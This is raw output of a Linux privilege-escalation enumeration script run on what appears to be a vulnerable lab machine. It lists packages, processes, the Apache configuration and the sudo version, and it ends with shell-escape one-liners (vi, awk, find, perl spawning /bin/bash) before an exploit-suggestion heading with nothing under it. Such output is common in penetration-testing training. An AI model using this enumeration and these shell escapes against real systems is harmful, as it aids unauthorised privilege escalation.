samba 2:4.3.9+dfsg-0ubuntu0.16.04.2 SMB/CIFS file, print, and login server for Unix
samba-common 2:4.3.9+dfsg-0ubuntu0.16.04.2 common files used by both the Samba server and client
samba-common-bin 2:4.3.9+dfsg-0ubuntu0.16.04.2 Samba common files used by both the server and the client
samba-dsdb-modules 2:4.3.9+dfsg-0ubuntu0.16.04.2 Samba Directory Services Database
samba-libs:i386 2:4.3.9+dfsg-0ubuntu0.16.04.2 Samba core libraries
samba-vfs-modules 2:4.3.9+dfsg-0ubuntu0.16.04.2 Samba Virtual FileSystem plugins
screen 4.3.1-2build1 terminal multiplexer with VT100/ANSI terminal emulation
sed 4.2.2-7 The GNU sed stream editor
sensible-utils 0.0.9 Utilities for sensible alternative selection
sgml-base 1.26+nmu4ubuntu1 SGML infrastructure and SGML catalog file support
shared-mime-info 1.5-2 FreeDesktop.org shared MIME database and spec
snapd 2.0.2 Tool to interact with Ubuntu Core Snappy.
software-properties-common 0.96.20 manage the repositories that you install software from (common)
sosreport 3.2+git276-g7da50d6-3ubuntu1 Set of tools to gather troubleshooting data from a system
squashfs-tools 1:4.3-3ubuntu2 Tool to create and append to squashfs filesystems
ssh-import-id 5.5-0ubuntu1 securely retrieve an SSH public key and install it locally
ssl-cert 1.0.37 simple debconf wrapper for OpenSSL
sudo 1.8.16-0ubuntu1 Provide limited super user privileges to specific users
systemd 229-4ubuntu4 system and service manager
systemd-sysv 229-4ubuntu4 system and service manager - SysV links
sysv-rc 2.88dsf-59.3ubuntu2 System-V-like runlevel change mechanism
sysvinit-utils 2.88dsf-59.3ubuntu2 System-V-like utilities
tar 1.28-2.1 GNU version of the tar archiving utility
tasksel 3.34ubuntu3 tool for selecting tasks for installation on Debian systems
tasksel-data 3.34ubuntu3 official tasks used for installation of Debian systems
tcpd 7.6.q-25 Wietse Venema's TCP wrapper utilities
tdb-tools 1.3.8-2 Trivial Database - bundled binaries
tmux 2.1-3build1 terminal multiplexer
tzdata 2016d-0ubuntu0.16.04 time zone and daylight-saving time data
ubuntu-cloudimage-keyring 2013.11.11 GnuPG keys of the Ubuntu Cloud Image builder
ubuntu-core-launcher 1.0.27.1 Launcher for ubuntu-core (snappy) apps
ubuntu-keyring 2012.05.19 GnuPG keys of the Ubuntu archive
ubuntu-server 1.361 The Ubuntu Server system
ucf 3.0036 Update Configuration File(s): preserve user changes to config files
udev 229-4ubuntu4 /dev/ and hotplug management daemon
uidmap 1:4.2-3.1ubuntu5 programs to help use subuids
unattended-upgrades 0.90 automatic installation of security upgrades
unzip 6.0-20ubuntu1 De-archiver for .zip files
update-inetd 4.43 inetd configuration file updater
update-notifier-common 3.168 Files shared between update-notifier and other packages
ureadahead 0.100.0-19 Read required files in advance
usbutils 1:007-4 Linux USB utilities
util-linux 2.27.1-6ubuntu3 miscellaneous system utilities
vim 2:7.4.1689-3ubuntu1 Vi IMproved - enhanced vi editor
vim-common 2:7.4.1689-3ubuntu1 Vi IMproved - Common files
vim-runtime 2:7.4.1689-3ubuntu1 Vi IMproved - Runtime files
vim-tiny 2:7.4.1689-3ubuntu1 Vi IMproved - enhanced vi editor - compact version
vlan 1.9-3.2ubuntu1 user mode programs to enable VLANs on your ethernet devices
vsftpd 3.0.3-3ubuntu2 lightweight, efficient FTP server written for security
wget 1.17.1-1ubuntu1 retrieves files from the web
whiptail 0.52.18-1ubuntu2 Displays user-friendly dialog boxes from shell scripts
wireless-regdb 2015.07.20-1ubuntu1 wireless regulatory database
xauth 1:1.0.9-1ubuntu2 X authentication utility
xdg-user-dirs 0.15-2ubuntu6 tool to manage well known user directories
xfsprogs 4.3.0+nmu1ubuntu1 Utilities for managing the XFS filesystem
xkb-data 2.16-1ubuntu1 X Keyboard Extension (XKB) configuration data
xml-core 0.13+nmu2 XML infrastructure and XML catalog file support
xz-utils 5.1.1alpha+20120614-2ubuntu2 XZ-format compression utilities
zerofree 1.0.3-1 zero free blocks from ext2, ext3 and ext4 file-systems
zlib1g:i386 1:1.2.8.dfsg-2ubuntu4 compression library - runtime
zsh 5.1.1-1ubuntu2 shell with lots of features
zsh-common 5.1.1-1ubuntu2 architecture independent files for Zsh
[+] Current processes
USER PID START TIME COMMAND
root 1 14:08 0:17 /sbin/init
root 2 14:08 0:00 [kthreadd]
root 3 14:08 2:50 [ksoftirqd/0]
root 5 14:08 0:00 [kworker/0:0H]
root 7 14:08 0:52 [rcu_sched]
root 8 14:08 0:00 [rcu_bh]
root 9 14:08 0:00 [migration/0]
root 10 14:08 0:02 [watchdog/0]
root 11 14:08 0:00 [kdevtmpfs]
root 12 14:08 0:00 [netns]
root 13 14:08 0:00 [perf]
root 14 14:08 0:00 [khungtaskd]
root 15 14:08 0:00 [writeback]
root 16 14:08 0:00 [ksmd]
root 17 14:08 0:02 [khugepaged]
root 18 14:08 0:00 [crypto]
root 19 14:08 0:00 [kintegrityd]
root 20 14:08 0:00 [bioset]
root 21 14:08 0:00 [kblockd]
root 22 14:08 0:00 [ata_sff]
root 23 14:08 0:00 [md]
root 24 14:08 0:00 [devfreq_wq]
root 28 14:08 0:00 [kswapd0]
root 29 14:08 0:00 [vmstat]
root 30 14:08 0:00 [fsnotify_mark]
root 31 14:08 0:00 [ecryptfs-kthrea]
root 46 14:08 0:00 [kthrotld]
root 47 14:08 0:00 [acpi_thermal_pm]
root 50 14:08 0:00 [bioset]
root 51 14:08 0:00 [bioset]
root 52 14:08 0:00 [bioset]
root 53 14:08 0:00 [bioset]
root 54 14:08 0:00 [bioset]
root 55 14:08 0:00 [bioset]
root 56 14:08 0:00 [bioset]
root 57 14:08 0:00 [bioset]
root 58 14:08 0:00 [bioset]
root 59 14:08 0:00 [bioset]
root 60 14:08 0:00 [bioset]
root 61 14:08 0:00 [bioset]
root 62 14:08 0:00 [bioset]
root 63 14:08 0:00 [bioset]
root 64 14:08 0:00 [bioset]
root 65 14:08 0:00 [bioset]
root 66 14:08 0:00 [bioset]
root 67 14:08 0:00 [bioset]
root 68 14:08 0:00 [bioset]
root 69 14:08 0:00 [bioset]
root 70 14:08 0:00 [bioset]
root 71 14:08 0:00 [bioset]
root 72 14:08 0:00 [bioset]
root 73 14:08 0:00 [bioset]
root 74 14:08 0:00 [ipv6_addrconf]
root 87 14:08 0:00 [deferwq]
root 88 14:08 0:00 [charger_manager]
root 134 14:08 0:00 [kpsmoused]
root 175 14:08 0:00 [scsi_eh_0]
root 176 14:08 0:00 [scsi_tmf_0]
root 177 14:08 0:00 [scsi_eh_1]
root 178 14:08 0:00 [scsi_tmf_1]
root 179 14:08 0:00 [scsi_eh_2]
root 180 14:08 0:00 [scsi_tmf_2]
root 181 14:08 0:00 [scsi_eh_3]
root 182 14:08 0:00 [scsi_tmf_3]
root 183 14:08 0:00 [scsi_eh_4]
root 184 14:08 0:00 [scsi_tmf_4]
root 185 14:08 0:00 [scsi_eh_5]
root 186 14:08 0:00 [scsi_tmf_5]
root 187 14:08 0:00 [scsi_eh_6]
root 188 14:08 0:00 [scsi_tmf_6]
root 189 14:08 0:00 [scsi_eh_7]
root 190 14:08 0:00 [scsi_tmf_7]
root 191 14:08 0:00 [scsi_eh_8]
root 192 14:08 0:00 [scsi_tmf_8]
root 193 14:08 0:00 [scsi_eh_9]
root 194 14:08 0:00 [scsi_tmf_9]
root 195 14:08 0:00 [scsi_eh_10]
root 196 14:08 0:00 [scsi_tmf_10]
root 197 14:08 0:00 [scsi_eh_11]
root 198 14:08 0:00 [scsi_tmf_11]
root 199 14:08 0:00 [scsi_eh_12]
root 200 14:08 0:00 [scsi_tmf_12]
root 201 14:08 0:00 [scsi_eh_13]
root 202 14:08 0:00 [scsi_tmf_13]
root 203 14:08 0:00 [scsi_eh_14]
root 204 14:08 0:00 [scsi_tmf_14]
root 205 14:08 0:00 [scsi_eh_15]
root 206 14:08 0:00 [scsi_tmf_15]
root 207 14:08 0:00 [scsi_eh_16]
root 208 14:08 0:00 [scsi_tmf_16]
root 209 14:08 0:00 [scsi_eh_17]
root 210 14:08 0:00 [scsi_tmf_17]
root 211 14:08 0:00 [scsi_eh_18]
root 212 14:08 0:00 [scsi_tmf_18]
root 213 14:08 0:00 [scsi_eh_19]
root 214 14:08 0:00 [scsi_tmf_19]
root 215 14:08 0:00 [scsi_eh_20]
root 216 14:08 0:00 [scsi_tmf_20]
root 217 14:08 0:00 [scsi_eh_21]
root 218 14:08 0:00 [scsi_tmf_21]
root 219 14:08 0:00 [scsi_eh_22]
root 220 14:08 0:00 [scsi_tmf_22]
root 221 14:08 0:00 [scsi_eh_23]
root 222 14:08 0:00 [scsi_tmf_23]
root 223 14:08 0:00 [scsi_eh_24]
root 224 14:08 0:00 [scsi_tmf_24]
root 225 14:08 0:00 [scsi_eh_25]
root 226 14:08 0:00 [scsi_tmf_25]
root 227 14:08 0:00 [scsi_eh_26]
root 228 14:08 0:00 [scsi_tmf_26]
root 229 14:08 0:00 [scsi_eh_27]
root 230 14:08 0:00 [scsi_tmf_27]
root 231 14:08 0:00 [scsi_eh_28]
root 232 14:08 0:00 [scsi_tmf_28]
root 233 14:08 0:00 [scsi_eh_29]
root 234 14:08 0:00 [scsi_tmf_29]
root 263 14:08 0:00 [mpt_poll_0]
root 264 14:08 0:00 [mpt/0]
root 265 14:08 0:00 [bioset]
root 267 14:08 0:00 [scsi_eh_30]
root 268 14:08 0:00 [scsi_tmf_30]
root 369 14:09 0:00 [raid5wq]
root 401 14:09 0:00 [bioset]
root 428 14:09 0:03 [kworker/0:1H]
root 430 14:09 0:03 [jbd2/sda1-8]
root 431 14:09 0:00 [ext4-rsv-conver]
root 478 14:09 0:00 [iscsi_eh]
root 482 14:09 0:00 [ib_addr]
root 483 14:09 0:01 /lib/systemd/systemd-journald
root 486 14:09 0:00 [ib_mcast]
root 487 14:09 0:00 [ib_nl_sa_wq]
root 493 14:09 0:00 [ib_cm]
root 494 14:09 0:00 [iw_cm_wq]
root 497 14:09 0:00 [rdma_cm]
root 504 14:09 0:00 [kauditd]
root 505 14:09 0:00 /sbin/lvmetad
root 541 14:09 0:00 /lib/systemd/systemd-udevd
root 619 14:09 0:00 [iprt-VBoxWQueue]
root 724 14:09 0:00 /usr/sbin/acpid
daemon 727 14:09 0:00 /usr/sbin/atd
message+ 730 14:09 0:01 /usr/bin/dbus-daemon
root 733 14:09 0:00 /usr/sbin/cron
root 744 14:09 0:02 /usr/bin/lxcfs
syslog 757 14:09 0:00 /usr/sbin/rsyslogd
root 765 14:09 0:00 /lib/systemd/systemd-logind
root 778 14:09 1:33 [kworker/0:4]
root 813 14:09 0:00 /sbin/mdadm
dnsmasq 834 14:09 0:00 /usr/sbin/dnsmasq
root 902 14:09 0:00 /usr/sbin/sshd
root 946 14:09 0:00 /usr/sbin/vsftpd
mysql 955 14:09 0:25 /usr/sbin/mysqld
root 969 14:09 0:01 /sbin/iscsid
root 970 14:09 0:40 /sbin/iscsid
nobody 1091 14:09 0:00 /usr/sbin/atftpd
root 1104 14:09 0:00 /usr/sbin/inetutils-inetd
root 1109 14:09 0:06 php-fpm:
www-data 1135 14:09 0:00 php-fpm:
www-data 1136 14:09 0:00 php-fpm:
root 1166 14:09 0:00 /usr/sbin/smbd
root 1167 14:09 0:00 /usr/sbin/smbd
root 1171 14:09 0:00 dhclient
root 1173 14:09 0:04 /usr/sbin/nmbd
root 1174 14:09 0:00 /usr/sbin/smbd
root 1191 14:09 0:07 /usr/sbin/apache2
root 1301 14:09 0:00 /bin/bash
root 1303 14:09 0:00 /bin/bash
root 1305 14:09 0:00 su
root 1307 14:09 0:00 su
JKanode 1325 14:09 0:00 /lib/systemd/systemd
JKanode 1327 14:09 0:00 (sd-pam)
root 1331 14:09 0:02 /sbin/agetty
www 1336 14:09 0:00 /lib/systemd/systemd
www 1338 14:09 0:00 (sd-pam)
JKanode 1344 14:09 0:00 bash
JKanode 1345 14:09 0:22 python2
www 1346 14:09 0:00 bash
www 1347 14:09 0:17 php
root 1371 14:10 0:00 /usr/lib/postfix/sbin/master
postfix 1377 14:10 0:00 qmgr
root 1541 14:18 0:00 nc
postfix 7403 19:07 0:00 pickup
www-data 7607 19:22 0:00 /usr/sbin/apache2
www-data 7924 19:58 0:00 /usr/sbin/apache2
root 7962 20:04 0:00 [kworker/u2:1]
root 8131 20:15 0:00 [kworker/0:1]
root 8146 20:16 0:00 [kworker/u2:0]
www-data 8558 20:21 0:00 /usr/sbin/apache2
www-data 8560 20:22 0:00 /usr/sbin/apache2
www-data 8569 20:23 0:00 sh
www-data 8570 20:23 0:00 python
www-data 8571 20:23 0:00 /bin/sh
www-data 8572 20:23 0:00 /usr/sbin/apache2
root 8573 20:23 0:00 [kworker/u2:2]
www-data 8578 20:23 0:00 /usr/sbin/apache2
root 8611 20:24 0:00 [kworker/0:0]
root 8631 20:26 0:00 /usr/sbin/smbd
www-data 8633 20:26 0:00 python
www-data 8965 20:26 0:00 /bin/sh
www-data 8966 20:26 0:00 ps
www-data 8967 20:26 0:00 awk
[+] Apache Version and Modules
Server version: Apache/2.4.18 (Ubuntu)
Server built: 2016-04-15T18:00:57
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
headers_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php7_module (shared)
rewrite_module (shared)
setenvif_module (shared)
socache_shmcb_module (shared)
ssl_module (shared)
status_module (shared)
Compiled in modules:
core.c
mod_so.c
mod_watchdog.c
http_core.c
mod_log_config.c
mod_logio.c
mod_version.c
mod_unixd.c
[+] Apache Config File
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.
# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
# /etc/apache2/
# |-- apache2.conf
# | `-- ports.conf
# |-- mods-enabled
# | |-- *.load
# | `-- *.conf
# |-- conf-enabled
# | `-- *.conf
# `-- sites-enabled
# `-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
# together by including all remaining configuration files when starting up the
# web server.
#
# * ports.conf is always included from the main configuration file. It is
# supposed to determine listening ports for incoming connections which can be
# customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
# directories contain particular configuration snippets which manage modules,
# global configuration fragments, or virtual host configurations,
# respectively.
#
# They are activated by symlinking available configuration files from their
# respective *-available/ counterparts. These should be managed by using our
# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
# their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
# the default configuration, apache2 needs to be started/stopped with
# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
# work with the default configuration.
# Global configuration
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at );
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
Options FollowSymLinks
AllowOverride None
Require all denied
AllowOverride None
Require all granted
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
#
# Options Indexes FollowSymLinks
# AllowOverride None
# Require all granted
#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives. See also the AllowOverride
# directive.
#
AccessFileName .htaccess
#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#
Require all denied
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 189 14:08 0:00 [scsi_eh_7]
root 3 14:08 2:50 [ksoftirqd/0]
root 263 14:08 0:00 [mpt_poll_0]
root 428 14:09 0:03 [kworker/0:1H]
root 194 14:08 0:00 [scsi_tmf_9]
root 175 14:08 0:00 [scsi_eh_0]
root 227 14:08 0:00 [scsi_eh_26]
root 969 14:09 0:01 /sbin/iscsid
root 1307 14:09 0:00 su
root 191 14:08 0:00 [scsi_eh_8]
root 71 14:08 0:00 [bioset]
root 11 14:08 0:00 [kdevtmpfs]
root 208 14:08 0:00 [scsi_tmf_16]
root 724 14:09 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid 1:2.0.26-1ubuntu2 Advanced Configuration and Power Interface event daemon
root 494 14:09 0:00 [iw_cm_wq]
root 215 14:08 0:00 [scsi_eh_20]
root 68 14:08 0:00 [bioset]
root 62 14:08 0:00 [bioset]
root 63 14:08 0:00 [bioset]
root 220 14:08 0:00 [scsi_tmf_22]
root 21 14:08 0:00 [kblockd]
root 192 14:08 0:00 [scsi_tmf_8]
root 177 14:08 0:00 [scsi_eh_1]
root 54 14:08 0:00 [bioset]
root 265 14:08 0:00 [bioset]
root 224 14:08 0:00 [scsi_tmf_24]
root 16 14:08 0:00 [ksmd]
root 10 14:08 0:02 [watchdog/0]
root 970 14:09 0:40 /sbin/iscsid
root 15 14:08 0:00 [writeback]
root 58 14:08 0:00 [bioset]
root 902 14:09 0:00 /usr/sbin/sshd
root 401 14:09 0:00 [bioset]
root 181 14:08 0:00 [scsi_eh_3]
root 73 14:08 0:00 [bioset]
root 478 14:09 0:00 [iscsi_eh]
root 497 14:09 0:00 [rdma_cm]
root 234 14:08 0:00 [scsi_tmf_29]
root 8 14:08 0:00 [rcu_bh]
root 486 14:09 0:00 [ib_mcast]
root 28 14:08 0:00 [kswapd0]
root 8146 20:16 0:00 [kworker/u2:0]
root 205 14:08 0:00 [scsi_eh_15]
root 180 14:08 0:00 [scsi_tmf_2]
root 222 14:08 0:00 [scsi_tmf_23]
root 61 14:08 0:00 [bioset]
root 87 14:08 0:00 [deferwq]
root 619 14:09 0:00 [iprt-VBoxWQueue]
root 1305 14:09 0:00 su
root 213 14:08 0:00 [scsi_eh_19]
root 47 14:08 0:00 [acpi_thermal_pm]
root 179 14:08 0:00 [scsi_eh_2]
root 5 14:08 0:00 [kworker/0:0H]
root 483 14:09 0:01 /lib/systemd/systemd-journald
root 210 14:08 0:00 [scsi_tmf_17]
root 17 14:08 0:02 [khugepaged]
root 1171 14:09 0:00 dhclient
root 184 14:08 0:00 [scsi_tmf_4]
root 212 14:08 0:00 [scsi_tmf_18]
root 505 14:09 0:00 /sbin/lvmetad
root 493 14:09 0:00 [ib_cm]
root 1174 14:09 0:00 /usr/sbin/smbd
root 231 14:08 0:00 [scsi_eh_28]
root 202 14:08 0:00 [scsi_tmf_13]
root 226 14:08 0:00 [scsi_tmf_25]
root 183 14:08 0:00 [scsi_eh_4]
root 229 14:08 0:00 [scsi_eh_27]
root 200 14:08 0:00 [scsi_tmf_12]
root 178 14:08 0:00 [scsi_tmf_1]
root 72 14:08 0:00 [bioset]
root 18 14:08 0:00 [crypto]
root 185 14:08 0:00 [scsi_eh_5]
root 188 14:08 0:00 [scsi_tmf_6]
root 12 14:08 0:00 [netns]
root 29 14:08 0:00 [vmstat]
root 57 14:08 0:00 [bioset]
root 813 14:09 0:00 /sbin/mdadm
Possible Related Packages:
mdadm 3.3-2ubuntu7 tool to administer Linux MD arrays (software RAID)
root 1541 14:18 0:00 nc
root 46 14:08 0:00 [kthrotld]
root 232 14:08 0:00 [scsi_tmf_28]
root 1301 14:09 0:00 /bin/bash
Possible Related Packages:
bash 4.3-14ubuntu1 GNU Bourne Again SHell
root 268 14:08 0:00 [scsi_tmf_30]
root 217 14:08 0:00 [scsi_eh_21]
root 1167 14:09 0:00 /usr/sbin/smbd
root 176 14:08 0:00 [scsi_tmf_0]
root 946 14:09 0:00 /usr/sbin/vsftpd
Possible Related Packages:
vsftpd 3.0.3-3ubuntu2 lightweight, efficient FTP server written for security
root 52 14:08 0:00 [bioset]
root 24 14:08 0:00 [devfreq_wq]
root 211 14:08 0:00 [scsi_eh_18]
root 70 14:08 0:00 [bioset]
root 744 14:09 0:02 /usr/bin/lxcfs
Possible Related Packages:
lxcfs 2.0.0-0ubuntu2 FUSE based filesystem for LXC
root 198 14:08 0:00 [scsi_tmf_11]
root 8631 20:26 0:00 /usr/sbin/smbd
root 214 14:08 0:00 [scsi_tmf_19]
root 1109 14:09 0:06 php-fpm:
root 64 14:08 0:00 [bioset]
root 1173 14:09 0:04 /usr/sbin/nmbd
root 216 14:08 0:00 [scsi_tmf_20]
root 182 14:08 0:00 [scsi_tmf_3]
root 22 14:08 0:00 [ata_sff]
root 74 14:08 0:00 [ipv6_addrconf]
root 8131 20:15 0:00 [kworker/0:1]
root 778 14:09 1:33 [kworker/0:4]
root 1303 14:09 0:00 /bin/bash
Possible Related Packages:
bash 4.3-14ubuntu1 GNU Bourne Again SHell
root 1331 14:09 0:02 /sbin/agetty
root 196 14:08 0:00 [scsi_tmf_10]
root 218 14:08 0:00 [scsi_tmf_21]
root 209 14:08 0:00 [scsi_eh_17]
root 7 14:08 0:52 [rcu_sched]
root 201 14:08 0:00 [scsi_eh_13]
root 1104 14:09 0:00 /usr/sbin/inetutils-inetd
Possible Related Packages:
inetutils-inetd 2:1.9.4-1build1 internet super server
root 264 14:08 0:00 [mpt/0]
root 225 14:08 0:00 [scsi_eh_25]
root 199 14:08 0:00 [scsi_eh_12]
root 51 14:08 0:00 [bioset]
root 207 14:08 0:00 [scsi_eh_16]
root 1 14:08 0:17 /sbin/init
Possible Related Packages:
busybox-initramfs 1:1.22.0-15ubuntu1 Standalone shell setup for initramfs
cloud-initramfs-copymods 0.27ubuntu1 copy initramfs modules into root filesystem for later use
cloud-initramfs-dyn-netconf 0.27ubuntu1 write a network interface file in /run for BOOTIF
init 1.29ubuntu1 System-V-like init utilities - metapackage
init-system-helpers 1.29ubuntu1 helper tools for all init systems
initramfs-tools 0.122ubuntu8 generic modular initramfs generator (automation)
initramfs-tools-bin 0.122ubuntu8 binaries used by initramfs-tools
initramfs-tools-core 0.122ubuntu8 generic modular initramfs generator (core tools)
initscripts 2.88dsf-59.3ubuntu2 scripts for initializing and shutting down the system
insserv 1.14.0-5ubuntu3 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.4-8ubuntu1 minimal libc subset for use with initramfs
lsb-base 9.20160110 Linux Standard Base init script functionality
ncurses-base 6.0+20160213-1ubuntu1 basic terminal type definitions
ncurses-term 6.0+20160213-1ubuntu1 additional terminal type definitions
open-iscsi 2.0.873+git0.3b4b4500-14ubuntu3 iSCSI initiator tools
pastebinit 1.5-1 command-line pastebin client
sysvinit-utils 2.88dsf-59.3ubuntu2 System-V-like utilities
root 66 14:08 0:00 [bioset]
root 9 14:08 0:00 [migration/0]
root 1166 14:09 0:00 /usr/sbin/smbd
root 221 14:08 0:00 [scsi_eh_23]
root 23 14:08 0:00 [md]
root 233 14:08 0:00 [scsi_eh_29]
root 8573 20:23 0:00 [kworker/u2:2]
root 487 14:09 0:00 [ib_nl_sa_wq]
root 31 14:08 0:00 [ecryptfs-kthrea]
root 88 14:08 0:00 [charger_manager]
root 186 14:08 0:00 [scsi_tmf_5]
root 7962 20:04 0:00 [kworker/u2:1]
root 765 14:09 0:00 /lib/systemd/systemd-logind
root 69 14:08 0:00 [bioset]
root 14 14:08 0:00 [khungtaskd]
root 30 14:08 0:00 [fsnotify_mark]
root 431 14:09 0:00 [ext4-rsv-conver]
root 67 14:08 0:00 [bioset]
root 267 14:08 0:00 [scsi_eh_30]
root 134 14:08 0:00 [kpsmoused]
root 369 14:09 0:00 [raid5wq]
root 541 14:09 0:00 /lib/systemd/systemd-udevd
root 2 14:08 0:00 [kthreadd]
root 65 14:08 0:00 [bioset]
root 1191 14:09 0:07 /usr/sbin/apache2
Possible Related Packages:
apache2 2.4.18-2ubuntu3 Apache HTTP Server
apache2-bin 2.4.18-2ubuntu3 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.18-2ubuntu3 Apache HTTP Server (common files)
apache2-utils 2.4.18-2ubuntu3 Apache HTTP Server (utility programs for web servers)
libapache2-mod-php7.0 7.0.4-7ubuntu2.1 server-side, HTML-embedded scripting language (Apache 2 module)
root 504 14:09 0:00 [kauditd]
root 430 14:09 0:03 [jbd2/sda1-8]
root 193 14:08 0:00 [scsi_eh_9]
root 195 14:08 0:00 [scsi_eh_10]
root 56 14:08 0:00 [bioset]
root 228 14:08 0:00 [scsi_tmf_26]
root 733 14:09 0:00 /usr/sbin/cron
Possible Related Packages:
cron 3.0pl1-128ubuntu2 process scheduling daemon
root 203 14:08 0:00 [scsi_eh_14]
root 50 14:08 0:00 [bioset]
root 53 14:08 0:00 [bioset]
root 60 14:08 0:00 [bioset]
root 204 14:08 0:00 [scsi_tmf_14]
root 223 14:08 0:00 [scsi_eh_24]
root 230 14:08 0:00 [scsi_tmf_27]
root 197 14:08 0:00 [scsi_eh_11]
root 1371 14:10 0:00 /usr/lib/postfix/sbin/master
Possible Related Packages:
base-passwd 3.5.39 Debian base system master password and group files
root 13 14:08 0:00 [perf]
root 482 14:09 0:00 [ib_addr]
root 187 14:08 0:00 [scsi_eh_6]
root 219 14:08 0:00 [scsi_eh_22]
root 59 14:08 0:00 [bioset]
root 19 14:08 0:00 [kintegrityd]
root 190 14:08 0:00 [scsi_tmf_7]
root 55 14:08 0:00 [bioset]
root 206 14:08 0:00 [scsi_tmf_15]
root 20 14:08 0:00 [bioset]
root 8611 20:24 0:00 [kworker/0:0]
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/vim
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
